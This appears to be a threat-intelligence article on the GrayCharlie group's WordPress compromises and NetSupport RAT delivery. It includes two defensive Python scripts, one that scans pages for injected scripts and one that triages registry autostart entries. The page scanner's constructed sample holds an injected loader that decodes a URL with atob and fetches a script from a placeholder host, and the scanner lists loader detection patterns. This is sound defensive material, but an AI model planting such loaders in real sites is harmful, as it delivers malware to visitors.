Since its formation in the middle of 2023, the GrayCharlie group has been a cybercriminal organization that actively compromises WordPress websites in order to propagate the NetSupport RAT (Remote Access Trojan) and steal confidential information. The threat actor uses sophisticated techniques to trick users into downloading malicious payloads, frequently using ClickFix pop-ups or phony browser update prompts. The ultimate objective of these attacks is information theft and financial gain through the use of malware like Stealer and SectopRAT.
The Infrastructure and Infection Chain of GrayCharlie

GrayCharlie injects JavaScript links into compromised WordPress websites. When a user visits one of these sites, the injected script takes them to a ClickFix pop-up or a phony browser update page, both of which entice the user to download malicious software.
The downloaded software installs NetSupport RAT, which grants attackers complete access to the victim's system, enabling them to track activities, obtain login credentials, and even take over the compromised computer. The Insikt Group has monitored GrayCharlie's activities and discovered a variety of infrastructure associated with the group, the majority of which is hosted by HZ Hosting Ltd. and MivoCloud. These hosts, along with other compromised infrastructure, act as NetSupport RAT's command-and-control (C2) servers.
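A defender-side check for the first link in the chain described above: a WordPress operator can scan their own rendered pages for script tags that load from hosts outside the site's own domain or a known CDN allowlist, or inline scripts that build a script element from a decoded string. This is an added example, not Recorded Future's tooling or anything from the campaign; the first-party hostnames, the CDN allowlist, and the sample page (including the `.invalid` loader host) are all constructed for illustration.

```python
"""
Added example: flag <script> tags on a WordPress page that load from a host not
on the site's allowlist, or inline scripts that show loader patterns (dynamic
script element creation plus string decoding). Hostnames below are assumed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY = {"example-blog.test", "www.example-blog.test"}          # assumed site hosts
KNOWN_GOOD_CDNS = {"cdnjs.cloudflare.com", "ajax.googleapis.com"}       # assumed allowlist


class ScriptCollector(HTMLParser):
    """Collect (src, inline_text) for every <script> element in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def classify_script(src, inline):
    """Return a reason string if the script looks injected, else None."""
    if src:
        host = urlparse(src).hostname
        if host is None:                      # relative path: same origin
            return None
        host = host.lower()
        if host in FIRST_PARTY or host in KNOWN_GOOD_CDNS:
            return None
        return f"external script host not on allowlist: {host}"
    # Inline script: look for a dynamically created script element fed by a decoded string.
    text = inline.lower()
    markers = ("createelement('script')", 'createelement("script")', "fromcharcode", "atob(")
    if any(m in text for m in markers):
        return "inline loader pattern (dynamic script element / decoded string)"
    return None


def scan_page(html):
    """Return [(src_or_'<inline>', reason)] for every suspicious script on the page."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, inline in collector.scripts:
        reason = classify_script(src, inline)
        if reason:
            findings.append((src or "<inline>", reason))
    return findings


# Constructed sample page: a theme script, a CDN script, one injected external
# loader on a placeholder host, and one inline loader that decodes its URL.
SAMPLE_HTML = """<html><head>
<script src="/wp-content/themes/twentytwenty/assets/js/index.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://injected-loader.invalid/stats.js"></script>
<script>
var s=document.createElement('script');s.src=atob('aHR0cHM6Ly9pbmplY3RlZC1sb2FkZXIuaW52YWxpZC9wLmpz');
document.head.appendChild(s);
</script>
</head><body><p>Welcome</p></body></html>"""

if __name__ == "__main__":
    for location, reason in scan_page(SAMPLE_HTML):
        print(f"{location}: {reason}")
```

Run it against the HTML a visitor actually receives (fetched with a normal browser user agent), not the theme files on disk: injected loaders are frequently served only to certain visitors, so the on-disk template can look clean while the rendered page is not.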
The group has also run staging infrastructure on these systems to deliver malicious payloads to compromised websites. Among the campaign's most alarming features is its circumvention of MFA (Multi-Factor Authentication): because the lures use live web pages, GrayCharlie tricks users into entering their credentials into legitimate login forms.

[Figure: An overview of GrayCharlie clusters seen in 2025 (Source: Recorded Future)]

By obtaining the resulting authentication tokens and session cookies, the attackers effectively eliminate the additional security measure.

Analysis of Attack Chains

GrayCharlie has been seen deploying NetSupport through two main attack chains.

Fake Browser Update Chain (RAT): This technique uses hacked websites to show a phony update prompt, tricking users into thinking they need to update their browser. The payload is delivered and silently executed after the user downloads the "update."

ClickFix Chain: In this variant, a ClickFix pop-up prompts the user to run a malicious command from the Windows Run dialog. The technique relies on social engineering to fool victims into executing malicious scripts themselves.
[Figure: "Wiser University" impersonation website (Source: Recorded Future)]

After installation, the malware establishes persistence by configuring registry keys so that the RAT launches at each system startup. Once it connects to the C2 servers, the attackers can remotely take control of the system, monitor activity, and steal data. To protect themselves from GrayCharlie's attacks, organizations must block known IP addresses and domains linked to the NetSupport RAT and related malware.
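The registry-based persistence mentioned above is something a responder can triage directly from a `reg.exe export` of the Run and RunOnce keys. The following added example (not Recorded Future's tooling) parses that export format and flags autostart entries whose executable lives in a user-writable directory (AppData, Temp, ProgramData, Public) and is not on a known-good allowlist. The allowlist, the directory markers, and the sample export (including the `SupportTool\remote_client.exe` and `Updater\upd.exe` entries) are constructed for illustration.

```python
"""
Added triage example: parse a reg.exe export of the Run / RunOnce autostart keys
and flag entries launching an executable from a user-writable directory that is
not on the allowlist. Allowlist and sample data are constructed.
"""
import re

# Assumed allowlist: legitimate autostart binaries known to live in user-writable paths.
KNOWN_GOOD_SUBSTRINGS = ("\\microsoft\\onedrive\\onedrive.exe",)
# Directory markers an unprivileged user (and therefore a user-level dropper) can write to.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def _unescape(data):
    """reg export escapes backslashes and double quotes with a backslash."""
    return re.sub(r"\\(.)", r"\1", data)


def _executable_path(command):
    """Extract the program path from a Run value: quoted path, or first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def triage_run_keys(reg_export):
    """Return a list of suspicious autostart entries found in a reg export."""
    findings = []
    current_key = None
    for raw in reg_export.splitlines():
        line = raw.strip()
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1)
            continue
        # Only look at values under ...\Run and ...\RunOnce.
        if current_key is None or not current_key.lower().endswith(("\\run", "\\runonce")):
            continue
        value_match = VALUE_RE.match(line)
        if not value_match:
            continue
        name, data = value_match.group(1), _unescape(value_match.group(2))
        path = _executable_path(data).lower()
        if not any(marker in path for marker in USER_WRITABLE_MARKERS):
            continue                                   # system/program-files location
        if any(good in path for good in KNOWN_GOOD_SUBSTRINGS):
            continue                                   # allowlisted
        findings.append({
            "key": current_key,
            "name": name,
            "path": path,
            "reason": "autostart from user-writable directory, not on allowlist",
        })
    return findings


# Constructed sample export: two benign entries, one allowlisted user-profile
# entry, and two entries that a dropper-style install would typically create.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"RemoteClient"="\"C:\\Users\\alice\\AppData\\Roaming\\SupportTool\\remote_client.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Updater"="C:\\ProgramData\\Updater\\upd.exe /silent"
"""

if __name__ == "__main__":
    for finding in triage_run_keys(SAMPLE_EXPORT):
        print(f"{finding['key']}\\{finding['name']} -> {finding['path']}: {finding['reason']}")
```

A path heuristic alone produces false positives (legitimate per-user installers also live under AppData), which is why the allowlist check sits after it; in practice, follow each hit with a signature check on the binary and a look at what the process connects to, since the page notes the RAT beacons to C2 servers on start.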
[Figure: Website impersonating "Activitar" (Source: Recorded Future)]

To detect and stop infections, security teams should deploy up-to-date detection rules in formats such as YARA, Snort, and Sigma. Because the attackers regularly send stolen data back to their C2 servers, it is also critical to monitor for indications of data exfiltration.
Email filtering and increased awareness of dubious links are also important tactics for stopping these attacks. Organizations should make users aware of the risks posed by phony updates and dubious pop-ups. With its continuous operations and increasingly advanced tactics, GrayCharlie continues to pose a serious threat to businesses around the globe, said Recorded Future, particularly in sectors such as legal services that have recently been the focus of attacks.